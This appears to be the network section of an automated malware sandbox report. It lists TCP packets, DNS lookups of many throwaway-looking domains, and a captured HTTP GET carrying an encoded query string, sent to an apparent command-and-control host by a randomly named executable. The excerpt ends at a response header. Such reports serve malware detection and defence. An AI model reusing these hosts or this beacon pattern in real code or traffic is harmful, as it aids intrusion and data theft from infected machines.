                                                                        Nov 9, 2024 05:38:08.492327929 CET5002180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:38:08.497174025 CET80500213.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:38:09.122514963 CET80500213.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:38:09.155133963 CET80500213.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:38:09.155260086 CET5002180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:38:09.156048059 CET5002180192.168.2.53.33.130.190
                                                                        Nov 9, 2024 05:38:09.160980940 CET80500213.33.130.190192.168.2.5
                                                                        Nov 9, 2024 05:38:14.294637918 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:14.300021887 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:14.300373077 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:14.351756096 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:14.356687069 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270565987 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270581961 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270601034 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270612001 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270622969 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270633936 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270639896 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.270684004 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270694017 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270720005 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.270720005 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.270730019 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270742893 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.270751953 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.270791054 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.275475979 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.367202044 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.397938013 CET8050022217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:15.398080111 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:15.862185001 CET5002280192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:16.888982058 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:16.893929005 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:16.894001961 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:16.909898043 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:16.914716005 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.845988035 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846003056 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846014023 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846029997 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846043110 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846054077 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846065044 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846079111 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:17.846139908 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:17.846152067 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846163034 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846173048 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.846214056 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:17.846214056 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:17.973047018 CET8050023217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:17.973191023 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:18.424436092 CET5002380192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:19.445211887 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:19.450265884 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:19.450408936 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:19.461240053 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:19.466181040 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:19.466200113 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392112970 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392132044 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392147064 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392177105 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.392230988 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392251968 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392263889 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392271996 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.392277002 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392292023 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392302036 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.392304897 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392326117 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.392327070 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.392365932 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.514271975 CET8050024217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:20.514322996 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:20.971400023 CET5002480192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:21.993546963 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:21.999263048 CET8050025217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:22.005573034 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:22.013318062 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:22.019326925 CET8050025217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:22.966653109 CET8050025217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:23.018148899 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:23.090749979 CET8050025217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:23.090878010 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:23.091789961 CET5002580192.168.2.5217.160.0.220
                                                                        Nov 9, 2024 05:38:23.096530914 CET8050025217.160.0.220192.168.2.5
                                                                        Nov 9, 2024 05:38:28.360853910 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:28.365761042 CET805002638.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:28.365824938 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:28.385512114 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:28.390732050 CET805002638.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:29.319983006 CET805002638.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:29.471283913 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:29.501286030 CET805002638.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:29.503273964 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:29.895200968 CET5002680192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:30.911607981 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:30.916623116 CET805002738.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:30.916709900 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:30.926441908 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:30.931286097 CET805002738.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:31.881047010 CET805002738.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:31.925210953 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:32.062057018 CET805002738.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:32.067225933 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:32.440320969 CET5002780192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:33.461571932 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:33.466574907 CET805002838.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:33.466670036 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:33.479875088 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:33.484827042 CET805002838.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:33.484884024 CET805002838.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:34.422512054 CET805002838.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:34.471288919 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:34.604067087 CET805002838.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:34.604118109 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:34.991854906 CET5002880192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:36.007204056 CET5002980192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:36.012196064 CET805002938.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:36.015369892 CET5002980192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:36.023209095 CET5002980192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:36.027981043 CET805002938.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:36.960408926 CET805002938.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:37.142308950 CET805002938.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:37.142488956 CET5002980192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:37.170160055 CET5002980192.168.2.538.47.207.164
                                                                        Nov 9, 2024 05:38:37.175390005 CET805002938.47.207.164192.168.2.5
                                                                        Nov 9, 2024 05:38:42.211215019 CET5003080192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:42.216137886 CET805003013.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:42.216281891 CET5003080192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:42.226252079 CET5003080192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:42.231059074 CET805003013.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:42.917721987 CET805003013.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:42.917803049 CET5003080192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:43.737050056 CET5003080192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:43.741939068 CET805003013.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:44.756707907 CET5003180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:44.761748075 CET805003113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:44.761823893 CET5003180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:44.774008989 CET5003180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:44.778928995 CET805003113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:45.451400042 CET805003113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:45.453438044 CET5003180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:46.354439974 CET5003180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:46.359433889 CET805003113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:47.365461111 CET5003280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:47.370615959 CET805003213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:47.371340990 CET5003280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:47.383235931 CET5003280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:47.388128996 CET805003213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:47.388158083 CET805003213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:48.047452927 CET805003213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:48.051281929 CET5003280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:48.895890951 CET5003280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:48.900861025 CET805003213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:49.912067890 CET5003380192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:49.917068005 CET805003313.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:49.919377089 CET5003380192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:49.926085949 CET5003380192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:49.931112051 CET805003313.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:50.598089933 CET805003313.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:50.630095959 CET805003313.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:50.630182028 CET5003380192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:50.631160975 CET5003380192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:38:50.635937929 CET805003313.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:38:56.275235891 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:56.280205011 CET8050034156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:38:56.280328989 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:56.292984009 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:56.297986031 CET8050034156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:38:57.244523048 CET8050034156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:38:57.393167019 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:57.424376011 CET8050034156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:38:57.425571918 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:57.807056904 CET5003480192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:59.386909008 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:59.392179012 CET8050035156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:38:59.392258883 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:59.405647993 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:38:59.411681890 CET8050035156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:00.362777948 CET8050035156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:00.471338034 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:00.547060013 CET8050035156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:00.547151089 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:00.909089088 CET5003580192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:02.271418095 CET5003680192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:02.276367903 CET8050036156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:02.276453018 CET5003680192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:02.287245989 CET5003680192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:02.292198896 CET8050036156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:02.292212009 CET8050036156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:03.235816956 CET8050036156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:03.287241936 CET5003680192.168.2.5156.234.28.94
                                                                        Nov 9, 2024 05:39:03.418440104 CET8050036156.234.28.94192.168.2.5
                                                                        Nov 9, 2024 05:39:03.418503046 CET5003680192.168.2.5156.234.28.94

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 9, 2024 05:35:28.574440002 CET6389453192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:35:28.713120937 CET53638941.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:35:44.505898952 CET6457853192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:35:44.590266943 CET53645781.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:35:52.646565914 CET5086153192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:35:52.657118082 CET53508611.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:36:06.396645069 CET5160653192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:36:06.438498974 CET53516061.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:36:20.181874990 CET6146853192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:36:20.194516897 CET53614681.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:36:34.131459951 CET5406353192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:36:34.156884909 CET53540631.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:36:47.555059910 CET5053553192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:36:47.567584991 CET53505351.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:37:00.881824970 CET6450453192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:37:01.210628033 CET53645041.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:37:19.679107904 CET5490253192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:37:19.695743084 CET53549021.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:37:33.068763018 CET5018253192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:37:33.107609034 CET53501821.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:37:46.696116924 CET5955353192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:37:46.762619972 CET53595531.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:00.663558960 CET6135853192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:00.675231934 CET53613581.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:14.251178980 CET6315253192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:14.292237997 CET53631521.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:28.101355076 CET6048853192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:28.357949972 CET53604881.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:42.182879925 CET5851853192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:42.205980062 CET53585181.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:55.646624088 CET5210053192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:56.271589041 CET53521001.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 9, 2024 05:35:28.574440002 CET192.168.2.51.1.1.10xbb81Standard query (0)www.tubetrexhd.buzzA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:35:44.505898952 CET192.168.2.51.1.1.10xfbccStandard query (0)www.rka6460.onlineA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:35:52.646565914 CET192.168.2.51.1.1.10xbff9Standard query (0)www.moneta.lifeA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:06.396645069 CET192.168.2.51.1.1.10xa0c4Standard query (0)www.mjmegartravel.onlineA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:20.181874990 CET192.168.2.51.1.1.10x29b3Standard query (0)www.digitaladpro.shopA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:34.131459951 CET192.168.2.51.1.1.10xc96eStandard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:47.555059910 CET192.168.2.51.1.1.10xeb5fStandard query (0)www.energyparks.netA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:00.881824970 CET192.168.2.51.1.1.10xb3e1Standard query (0)www.estrela-b.onlineA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:19.679107904 CET192.168.2.51.1.1.10xef22Standard query (0)www.winspinoffr.proA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:33.068763018 CET192.168.2.51.1.1.10xffbdStandard query (0)www.maviro.xyzA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:46.696116924 CET192.168.2.51.1.1.10xfaacStandard query (0)www.thefokusdong43.clickA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:00.663558960 CET192.168.2.51.1.1.10x6b92Standard query (0)www.7fh27o.vipA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:14.251178980 CET192.168.2.51.1.1.10x5626Standard query (0)www.eyecatch.proA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:28.101355076 CET192.168.2.51.1.1.10x5ee6Standard query (0)www.t95yd.topA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:42.182879925 CET192.168.2.51.1.1.10x4c02Standard query (0)www.sonoscan.orgA (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:55.646624088 CET192.168.2.51.1.1.10xe483Standard query (0)www.jllllbx.topA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 9, 2024 05:35:28.713120937 CET1.1.1.1192.168.2.50xbb81No error (0)www.tubetrexhd.buzz194.195.220.41A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:35:44.590266943 CET1.1.1.1192.168.2.50xfbccNo error (0)www.rka6460.onlinerka6460.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:35:52.657118082 CET1.1.1.1192.168.2.50xbff9No error (0)www.moneta.life13.248.169.48A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:35:52.657118082 CET1.1.1.1192.168.2.50xbff9No error (0)www.moneta.life76.223.54.146A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:06.438498974 CET1.1.1.1192.168.2.50xa0c4No error (0)www.mjmegartravel.onlinemjmegartravel.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:06.438498974 CET1.1.1.1192.168.2.50xa0c4No error (0)mjmegartravel.online76.223.67.189A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:06.438498974 CET1.1.1.1192.168.2.50xa0c4No error (0)mjmegartravel.online13.248.213.45A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:20.194516897 CET1.1.1.1192.168.2.50x29b3No error (0)www.digitaladpro.shopghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:20.194516897 CET1.1.1.1192.168.2.50x29b3No error (0)ghs.google.com172.217.16.211A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:34.156884909 CET1.1.1.1192.168.2.50xc96eNo error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:47.567584991 CET1.1.1.1192.168.2.50xeb5fNo error (0)www.energyparks.netenergyparks.netCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:47.567584991 CET1.1.1.1192.168.2.50xeb5fNo error (0)energyparks.net3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:36:47.567584991 CET1.1.1.1192.168.2.50xeb5fNo error (0)energyparks.net15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:01.210628033 CET1.1.1.1192.168.2.50xb3e1No error (0)www.estrela-b.onlineestrela-b.onlineCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:01.210628033 CET1.1.1.1192.168.2.50xb3e1No error (0)estrela-b.online162.241.63.77A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:19.695743084 CET1.1.1.1192.168.2.50xef22No error (0)www.winspinoffr.pro167.172.133.32A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:33.107609034 CET1.1.1.1192.168.2.50xffbdNo error (0)www.maviro.xyz67.223.117.142A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:46.762619972 CET1.1.1.1192.168.2.50xfaacNo error (0)www.thefokusdong43.clickthefokusdong43.clickCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:37:46.762619972 CET1.1.1.1192.168.2.50xfaacNo error (0)thefokusdong43.click172.96.191.232A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:00.675231934 CET1.1.1.1192.168.2.50x6b92No error (0)www.7fh27o.vip7fh27o.vipCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:00.675231934 CET1.1.1.1192.168.2.50x6b92No error (0)7fh27o.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:00.675231934 CET1.1.1.1192.168.2.50x6b92No error (0)7fh27o.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:14.292237997 CET1.1.1.1192.168.2.50x5626No error (0)www.eyecatch.pro217.160.0.220A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:28.357949972 CET1.1.1.1192.168.2.50x5ee6No error (0)www.t95yd.topt95yd.topCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:28.357949972 CET1.1.1.1192.168.2.50x5ee6No error (0)t95yd.top38.47.207.164A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:42.205980062 CET1.1.1.1192.168.2.50x4c02No error (0)www.sonoscan.org13.248.169.48A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:42.205980062 CET1.1.1.1192.168.2.50x4c02No error (0)www.sonoscan.org76.223.54.146A (IP address)IN (0x0001)false
                                                                        Nov 9, 2024 05:38:56.271589041 CET1.1.1.1192.168.2.50xe483No error (0)www.jllllbx.top156.234.28.94A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • www.tubetrexhd.buzz
                                                                        • www.moneta.life
                                                                        • www.mjmegartravel.online
                                                                        • www.digitaladpro.shop
                                                                        • www.omnibizlux.biz
                                                                        • www.energyparks.net
                                                                        • www.estrela-b.online
                                                                        • www.winspinoffr.pro
                                                                        • www.maviro.xyz
                                                                        • www.thefokusdong43.click
                                                                        • www.7fh27o.vip
                                                                        • www.eyecatch.pro
                                                                        • www.t95yd.top
                                                                        • www.sonoscan.org
                                                                        • www.jllllbx.top

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549776194.195.220.41803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:35:28.732023954 CET491OUTGET /2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.tubetrexhd.buzz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:35:29.320390940 CET1236INHTTP/1.1 200 OK
                                                                        Server: openresty/1.13.6.1
                                                                        Date: Sat, 09 Nov 2024 04:35:29 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
